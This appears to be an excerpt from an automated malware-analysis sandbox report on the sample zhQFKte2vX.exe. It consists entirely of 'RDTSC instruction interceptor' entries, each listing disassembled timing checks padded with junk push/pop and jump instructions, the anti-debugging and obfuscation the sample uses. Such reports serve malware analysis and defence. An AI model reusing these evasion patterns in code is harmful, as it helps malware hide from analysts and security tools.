              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 745451 second address: 74546B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FCD7D2AFB12h 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 74546B second address: 74547E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCD7C4F0D9Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 7455A4 second address: 7455B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jo 00007FCD7D2AFB06h 0x0000000d pop eax 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 7455B2 second address: 7455BC instructions: 0x00000000 rdtsc 0x00000002 je 00007FCD7C4F0D9Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 753CA9 second address: 753CAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 751CAB second address: 751CBC instructions: 0x00000000 rdtsc 0x00000002 jng 00007FCD7C4F0D96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d push edx 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 751E66 second address: 751EA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pop edx 0x00000008 pushad 0x00000009 push eax 0x0000000a pushad 0x0000000b popad 0x0000000c push edi 0x0000000d pop edi 0x0000000e pop eax 0x0000000f push ebx 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 pop ebx 0x00000013 jnp 00007FCD7D2AFB0Ch 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FCD7D2AFB0Dh 0x00000020 jmp 00007FCD7D2AFB12h 0x00000025 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 751EA6 second address: 751EB0 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FCD7C4F0D96h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 752947 second address: 752951 instructions: 0x00000000 rdtsc 0x00000002 je 00007FCD7D2AFB06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 752AFC second address: 752B02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 753B64 second address: 753B68 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 7518C3 second address: 7518D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 js 00007FCD7C4F0D9Ah 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 75947F second address: 759485 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 759485 second address: 75948B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 759607 second address: 75960B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 7605CF second address: 7605D9 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FCD7C4F0D96h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 76046D second address: 760479 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FCD7D2AFB0Eh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 760479 second address: 760488 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jng 00007FCD7C4F0D96h 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 768E02 second address: 768E0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jo 00007FCD7D2AFB08h 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 775632 second address: 775636 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 775636 second address: 775653 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCD7D2AFB0Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b je 00007FCD7D2AFB06h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 775653 second address: 775657 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 775657 second address: 77565B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 77D380 second address: 77D384 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 77D23E second address: 77D242 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 7845E5 second address: 7845F5 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FCD7C4F0D96h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 7845F5 second address: 7845FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 784737 second address: 78473B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 78473B second address: 784746 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 784A2F second address: 784A4E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FCD7C4F0DA9h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 784A4E second address: 784A6B instructions: 0x00000000 rdtsc 0x00000002 jl 00007FCD7D2AFB0Eh 0x00000008 pushad 0x00000009 popad 0x0000000a jno 00007FCD7D2AFB06h 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 pop eax 0x00000017 jl 00007FCD7D2AFB06h 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 784A6B second address: 784A8E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jl 00007FCD7C4F0DA7h 0x0000000e jnl 00007FCD7C4F0D96h 0x00000014 jmp 00007FCD7C4F0D9Bh 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 784A8E second address: 784AA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCD7D2AFB10h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 784AA2 second address: 784AA6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 784AA6 second address: 784ABC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnp 00007FCD7D2AFB06h 0x00000010 je 00007FCD7D2AFB06h 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 784D8C second address: 784D92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 785917 second address: 78591C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 78591C second address: 785943 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCD7C4F0D9Ah 0x00000007 jg 00007FCD7C4F0DAFh 0x0000000d jmp 00007FCD7C4F0DA3h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 7894E9 second address: 7894EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 7894EF second address: 78950D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 jmp 00007FCD7C4F0DA4h 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 78950D second address: 789517 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FCD7D2AFB06h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 7972AE second address: 7972B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 7972B2 second address: 7972C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007FCD7D2AFB08h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 7943ED second address: 794420 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCD7C4F0DA7h 0x00000007 jmp 00007FCD7C4F0DA4h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 794420 second address: 79442A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FCD7D2AFB06h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 79442A second address: 79442E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 79442E second address: 794434 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 794434 second address: 79443E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FCD7C4F0D96h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 79443E second address: 794442 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 7A5157 second address: 7A517E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 pop eax 0x00000009 push edx 0x0000000a pop edx 0x0000000b jc 00007FCD7C4F0D96h 0x00000011 js 00007FCD7C4F0D96h 0x00000017 popad 0x00000018 popad 0x00000019 pushad 0x0000001a pushad 0x0000001b pushad 0x0000001c popad 0x0000001d pushad 0x0000001e popad 0x0000001f popad 0x00000020 push edi 0x00000021 pushad 0x00000022 popad 0x00000023 pop edi 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 7A517E second address: 7A5184 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 7A5184 second address: 7A51AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jc 00007FCD7C4F0D96h 0x0000000d jmp 00007FCD7C4F0DA9h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 7A4F76 second address: 7A4F8A instructions: 0x00000000 rdtsc 0x00000002 jns 00007FCD7D2AFB0Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 7A6D53 second address: 7A6D57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 7A6D57 second address: 7A6D5F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 7A6D5F second address: 7A6D65 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 7A6D65 second address: 7A6D69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 7BBAB3 second address: 7BBAB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 7BBAB7 second address: 7BBACF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007FCD7D2AFB12h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 7BBACF second address: 7BBAD5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 7BBAD5 second address: 7BBADB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 7BBADB second address: 7BBAF1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCD7C4F0DA2h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 7BBAF1 second address: 7BBB0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007FCD7D2AFB0Eh 0x0000000c pushad 0x0000000d popad 0x0000000e jnl 00007FCD7D2AFB06h 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 pushad 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 7BBB0E second address: 7BBB13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 7BBB13 second address: 7BBB34 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FCD7D2AFB12h 0x00000008 pushad 0x00000009 push esi 0x0000000a pop esi 0x0000000b push edx 0x0000000c pop edx 0x0000000d jbe 00007FCD7D2AFB06h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 7BAA7F second address: 7BAA89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FCD7C4F0D96h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 7BAA89 second address: 7BAAD6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCD7D2AFB16h 0x00000007 je 00007FCD7D2AFB06h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f popad 0x00000010 pushad 0x00000011 jmp 00007FCD7D2AFB12h 0x00000016 push esi 0x00000017 push eax 0x00000018 pop eax 0x00000019 je 00007FCD7D2AFB06h 0x0000001f pop esi 0x00000020 push ecx 0x00000021 jmp 00007FCD7D2AFB0Ch 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 7BAC30 second address: 7BAC50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FCD7C4F0D96h 0x0000000a pop ecx 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FCD7C4F0D9Fh 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 7BAC50 second address: 7BAC56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 7BAC56 second address: 7BAC63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jne 00007FCD7C4F0D96h 0x0000000c popad 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 7BAC63 second address: 7BAC68 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 7BAC68 second address: 7BAC74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FCD7C4F0D96h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 7BADD8 second address: 7BADF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCD7D2AFB0Eh 0x00000009 jnc 00007FCD7D2AFB06h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 7BADF0 second address: 7BADF4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 7BADF4 second address: 7BAE1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCD7D2AFB0Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jnc 00007FCD7D2AFB06h 0x00000013 jmp 00007FCD7D2AFB0Dh 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 7BAF5E second address: 7BAF75 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCD7C4F0DA1h 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 7BB33E second address: 7BB352 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCD7D2AFB10h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 7BB352 second address: 7BB368 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCD7C4F0D9Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 jp 00007FCD7C4F0D96h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 7BB368 second address: 7BB37C instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FCD7D2AFB06h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 7BB37C second address: 7BB386 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FCD7C4F0D96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 7BB386 second address: 7BB392 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007FCD7D2AFB06h 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 7BB392 second address: 7BB396 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 7BB7B9 second address: 7BB7BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 7BB7BF second address: 7BB7E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCD7C4F0D9Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FCD7C4F0DA5h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 7BFAE4 second address: 7BFAE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 7C171A second address: 7C1721 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 7C36FC second address: 7C3731 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCD7D2AFB11h 0x00000009 jmp 00007FCD7D2AFB15h 0x0000000e popad 0x0000000f pushad 0x00000010 jng 00007FCD7D2AFB06h 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 7C3731 second address: 7C3738 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6DB7DB second address: 6DB7DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6DB7DF second address: 6DB7F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCD7C4F0DA3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6DB7F6 second address: 6DB80F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCD7D2AFB0Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6DB80F second address: 6DB813 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 50802E8 second address: 50802FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCD7D2AFB11h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 50802FD second address: 5080301 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 5080301 second address: 5080325 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 jmp 00007FCD7D2AFB0Ah 0x0000000e mov dword ptr [esp], ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FCD7D2AFB0Ah 0x0000001a rdtsc
